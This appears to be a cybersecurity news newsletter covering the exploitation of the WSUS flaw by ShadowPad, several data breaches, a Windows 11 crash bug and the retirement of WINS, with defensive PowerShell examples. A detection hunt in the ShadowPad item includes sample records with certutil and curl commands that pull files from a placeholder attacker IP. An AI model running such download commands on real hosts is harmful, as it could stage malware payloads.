Cyber Briefing: 2025.11.24
ShadowPad and new C2 tactics emerge, Windows 11 bug causes crashes, major breaches hit multiple firms, WINS retired, teens charged, and Android gains AirDrop support.
👉 What’s the latest in the cyber world today?
Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.
🚨 Cyber Alerts
1. ShadowPad Exploits WSUS Flaw For Access
A critical deserialization flaw in Microsoft Windows Server Update Services (WSUS), tracked as CVE-2025-59287, has been actively exploited to achieve remote code execution and deploy ShadowPad, a modular backdoor long associated with Chinese state-sponsored espionage groups. After exploiting the flaw for initial access, attackers used PowerCat to obtain a shell on the WSUS server, then fetched the ShadowPad components with the built-in curl and certutil utilities and launched them via DLL side-loading, so the download stage relies only on tools already present on the host.
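The detail worth operationalising is the chain itself: the WSUS service process should never spawn certutil or curl to pull files from the internet. The following hunt is an added example written for this briefing, not code from the report or from any vendor. The parent process names (WsusService.exe and the IIS worker w3wp.exe that hosts the WSUS web app pool) are assumptions about a typical install, and the records are constructed to resemble Sysmon Event ID 1 fields rather than real telemetry.

```powershell
# Added example: flag download/decode commands whose parent is the WSUS service.
# Parent names and the sample records below are assumptions/constructed for illustration.
function Find-SuspiciousWsusChildren {
    param([Parameter(Mandatory)][object[]]$Events)

    # Assumption: WSUS code runs in these two processes on a default install.
    $wsusParents     = @('wsusservice.exe', 'w3wp.exe')
    $downloaders     = @('certutil.exe', 'curl.exe', 'powershell.exe', 'cmd.exe')
    $downloadPattern = '(?i)-urlcache|-split|-decode|curl[^\r\n]*https?://|DownloadString|DownloadFile'

    foreach ($e in $Events) {
        $parent = [IO.Path]::GetFileName($e.ParentImage).ToLower()
        $image  = [IO.Path]::GetFileName($e.Image).ToLower()
        if ($wsusParents -contains $parent -and $downloaders -contains $image) {
            [pscustomobject]@{
                Time        = $e.UtcTime
                Host        = $e.Computer
                Parent      = $parent
                Image       = $image
                CommandLine = $e.CommandLine
                Reason      = if ($e.CommandLine -match $downloadPattern) {
                                  'download/decode launched from WSUS process'
                              } else {
                                  'unexpected child of WSUS process'
                              }
            }
        }
    }
}

# Constructed sample records (Sysmon Event ID 1 style); not real telemetry.
$sample = @(
    [pscustomobject]@{ UtcTime='2025-11-20 03:12:44'; Computer='WSUS01'
        ParentImage='C:\Program Files\Update Services\Service\WsusService.exe'
        Image='C:\Windows\System32\cmd.exe'
        CommandLine='cmd.exe /c certutil -urlcache -split -f http://198.51.100.7/a.dat C:\ProgramData\a.dat' },
    [pscustomobject]@{ UtcTime='2025-11-20 03:12:45'; Computer='WSUS01'
        ParentImage='C:\Windows\System32\inetsrv\w3wp.exe'
        Image='C:\Windows\System32\curl.exe'
        CommandLine='curl.exe -o C:\ProgramData\b.dll http://198.51.100.7/b.dll' },
    [pscustomobject]@{ UtcTime='2025-11-20 03:15:02'; Computer='WSUS01'
        ParentImage='C:\Program Files\Update Services\Service\WsusService.exe'
        Image='C:\Program Files\Update Services\Tools\wsusutil.exe'
        CommandLine='wsusutil.exe checkhealth' },
    [pscustomobject]@{ UtcTime='2025-11-20 03:20:10'; Computer='ADMIN01'
        ParentImage='C:\Windows\explorer.exe'
        Image='C:\Windows\System32\curl.exe'
        CommandLine='curl.exe https://example.org' }
)

# Expected: the first two records are flagged; wsusutil and the admin's curl are not.
Find-SuspiciousWsusChildren -Events $sample | Format-Table -AutoSize
```

On a live WSUS server the same function can be fed real events by pulling Sysmon process-creation records with `Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1}` and mapping the ParentImage, Image and CommandLine fields. If the server also hosts other IIS sites, narrow the w3wp.exe match to the WSUS application pool to keep the false-positive rate down.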
2. Matrix Push C2 Uses Browser Alerts To Phish
Bad actors are now exploiting browser notifications for phishing through a new command-and-control (C2) platform known as Matrix Push C2. This sophisticated, fileless framework uses push notifications, fake alerts, and link redirects to compromise victims across various operating systems.
3. Windows 11 24H2 Explorer And Start Crash
A bug in Windows 11 24H2, introduced by cumulative updates released since July 2025, causes File Explorer, the Start Menu and other shell components to crash, most often for users who log in right after applying an update and for users of non-persistent virtual desktop environments. Microsoft confirmed the cause is a timing error in which the XAML dependency packages the shell needs are not registered after the update, and has published a temporary PowerShell workaround for affected users while a permanent fix is prepared.
💥 Cyber Incidents
4. Cox Confirms Oracle Hack As Victims Named
Cox Enterprises confirmed its Oracle E-Business Suite (EBS) was breached by cybercriminals between August 9 and 14, leading to the compromise of personal data belonging to nearly 9,500 individuals. This incident is part of a larger cybercrime campaign, linked to the Cl0p ransomware group and the FIN11 threat actor, which has targeted over 100 organizations globally, including major companies like Logitech and Mazda.
5. Iberia Alerts Customers To Data Breach
Spanish flag carrier Iberia notified customers that their names, email addresses, and frequent flyer numbers were stolen after a supplier was hacked. The airline stated that no passwords or full credit card data were compromised, and they have improved account security while investigating the incident with law enforcement.
6. Delta Dental Virginia Breach Hits 146,000
Dental services provider Delta Dental of Virginia (DDVA) has disclosed a data breach affecting approximately 146,000 individuals after an email account compromise allowed an unauthorized party to access and potentially steal personal and protected health information between March 21 and April 23 of this year. The compromised data included sensitive details such as names, Social Security numbers, and government-issued ID numbers, prompting DDVA to offer 12 months of free identity protection and credit monitoring services to those impacted.
📢 Cyber News
7. Microsoft To Remove WINS After 2025
Microsoft has announced that the legacy Windows Internet Name Service (WINS) will be removed from Windows Server in releases after Windows Server 2025 Long-Term Servicing Channel. WINS remains in Windows Server 2025 for that release's lifetime, which ends with extended support in November 2034, so organizations still relying on NetBIOS name resolution have a defined window to migrate to DNS.
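Before the feature disappears, the practical question is which hosts still depend on it. The script below is an added example for this briefing, not part of Microsoft's announcement; it uses standard Windows CIM properties and the ServerManager `Get-WindowsFeature` cmdlet to report adapters that still point at a WINS server or keep NetBIOS over TCP/IP enabled, and whether the WINS role is installed on a server.

```powershell
# Added example: inventory WINS/NetBIOS dependencies ahead of WINS removal.
# Uses only built-in Win32_NetworkAdapterConfiguration properties; nothing here is Microsoft's migration tooling.
function Get-WinsDependencyReport {
    # Client side: IP-enabled adapters with WINS servers or NetBIOS over TCP/IP still on.
    # TcpipNetbiosOptions: 0 = use DHCP setting, 1 = enabled, 2 = disabled.
    $adapters = Get-CimInstance Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE'
    foreach ($a in $adapters) {
        $netbios = switch ($a.TcpipNetbiosOptions) {
            0       { 'DHCP default' }
            1       { 'Enabled' }
            2       { 'Disabled' }
            default { 'Unknown' }
        }
        [pscustomobject]@{
            Adapter        = $a.Description
            WinsPrimary    = $a.WINSPrimaryServer
            WinsSecondary  = $a.WINSSecondaryServer
            NetbiosOverTcp = $netbios
            # Anything other than "no WINS servers and NetBIOS disabled" needs a migration decision.
            NeedsAttention = [bool]($a.WINSPrimaryServer -or $a.WINSSecondaryServer -or $a.TcpipNetbiosOptions -ne 2)
        }
    }
}

# Server side: is the WINS role feature installed? Get-WindowsFeature exists only on Windows Server.
if (Get-Command Get-WindowsFeature -ErrorAction SilentlyContinue) {
    Get-WindowsFeature -Name WINS | Select-Object Name, InstallState
}

Get-WinsDependencyReport | Format-Table -AutoSize
```

Run it across the estate through your usual remote-execution channel and collect the `NeedsAttention` rows; those are the hosts where single-label name lookups may silently fall back to NetBIOS broadcast once WINS is gone, which is also the behaviour that LLMNR/NBT-NS poisoning tools abuse, so disabling NetBIOS over TCP/IP once DNS suffixes are correct is the end state to aim for.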
8. Scattered Spider Members Deny TfL Charges
Two British teenagers, Thalha Jubair (19) and Owen Flowers (18), associated with the Scattered Spider hacking group, pleaded not guilty at Southwark Crown Court to charges related to a cyberattack against Transport for London (TfL). Both are charged under the Computer Misuse Act for allegedly conspiring to commit unauthorized acts against the transport network.
9. Google Adds AirDrop Support To Android
Google has updated its Quick Share file transfer service to work with Apple’s AirDrop, enabling easier file and photo sharing between Android (starting with the Pixel 10) and iPhone devices.
📈Cyber Stocks
On Monday, 24th November, cybersecurity stocks opened the week on a softer note as market sentiment remained cautious following last week’s selloff. Investors continued to grapple with macroeconomic uncertainty, subdued risk appetite, and concerns around enterprise IT spending cycles. While long-term demand for identity, cloud, and endpoint security stayed intact, the sector saw mixed performance with most names trending lower and only limited signs of stabilisation.
CrowdStrike closed at 490.67 dollars and declined further, extending its multi-session pullback as investors continued rotating out of high-growth cybersecurity names.
Palo Alto Networks closed at 182.90 dollars and moved lower, reflecting persistent caution around near-term enterprise budget timing and sector-wide valuation pressure.
Zscaler closed at 275.01 dollars and fell again, driven by continued weakness in cloud-security valuations despite strong underlying zero-trust adoption trends.
Fortinet closed at 78.86 dollars and posted a mild gain, supported by selective interest in defensive network-security names despite lingering concerns around firewall refresh cycles.
Okta closed at 78.68 dollars and edged slightly higher, indicating steady sentiment toward identity-security demand even as broader market conditions stayed fragile.
💡 Cyber Tip
🖥️ Windows 11 24H2 Bug Causes Explorer and Start Menu Crashes
Microsoft has confirmed a serious issue in Windows 11 version 24H2 where File Explorer, the Start Menu, and other shell components crash after installing recent cumulative updates. The problem affects users who log in right after updating and is especially disruptive in virtual desktop (VDI) environments. The root cause is a timing error that prevents essential XAML packages from registering properly during the post-update process.
What You Should Do
If your system is affected, run Microsoft's temporary PowerShell fix from an elevated session to re-register the XAML dependency packages the update left unregistered.
Restart your device after applying the workaround to restore full functionality.
In VDI or non-persistent environments, use Microsoft's recommended logon script so the packages are registered for each user before the desktop loads; registration is per user, so a one-off fix on the golden image is not enough.
Weigh deferring July 2025 or later cumulative updates on critical systems against the security fixes those updates carry; a staged rollout with the workaround in place is usually safer than leaving the patches uninstalled until Microsoft ships a permanent fix.
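For readers who want to see what "re-register the packages" looks like, the following is an added example written for this briefing and is not Microsoft's published workaround, which names specific packages; use Microsoft's commands on production systems. The `Microsoft.UI.Xaml*` name filter is an assumption about which dependency family is affected, and the script must run in an elevated PowerShell session because `Get-AppxPackage -AllUsers` requires it.

```powershell
# Added example, not Microsoft's workaround: re-register staged XAML dependency
# packages for the current user, then verify their status.
# Run elevated. The name filter is an assumption about the affected packages.
function Repair-XamlPackages {
    param([string]$NameFilter = 'Microsoft.UI.Xaml*')   # assumption

    $pkgs = Get-AppxPackage -AllUsers -Name $NameFilter
    if (-not $pkgs) {
        Write-Warning "No packages matching '$NameFilter' are staged on this machine."
        return
    }

    foreach ($p in $pkgs) {
        $manifest = Join-Path $p.InstallLocation 'AppxManifest.xml'
        if (-not (Test-Path $manifest)) {
            Write-Warning "Manifest missing for $($p.PackageFullName); skipping."
            continue
        }
        Write-Host "Re-registering $($p.PackageFullName)"
        # -Register with -DisableDevelopmentMode registers an already-staged package
        # in place for the current user rather than deploying it from a bundle.
        Add-AppxPackage -Register $manifest -DisableDevelopmentMode -ErrorAction Continue
    }

    # Verification: each matching package should now report Status 'Ok' for this user.
    Get-AppxPackage -Name $NameFilter | Select-Object Name, Version, Status
}

Repair-XamlPackages
```

Because registration is per user, the same function is what a logon script for non-persistent VDI would call; the verification line at the end is the check to keep in the script so a failed registration is visible in the logon log rather than only as a crashing Start Menu.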
Why This Matters
This bug can break core parts of the Windows interface, leaving systems partially usable or completely unstable. Organizations using VDI are at higher risk due to repeated provisioning, making the timing issue occur on every login. Applying the workaround helps restore stability until Microsoft releases a permanent update.
📚 Cyber Book
Emerging Cyber Threats and Cognitive Vulnerabilities by Vladlena Benson, John McAlaney
That concludes today's briefing.
Copyright © 2025 CyberMaterial. All Rights Reserved.
Follow CyberMaterial on:
Substack, LinkedIn, Twitter, Reddit, Instagram, Facebook, YouTube, and Medium.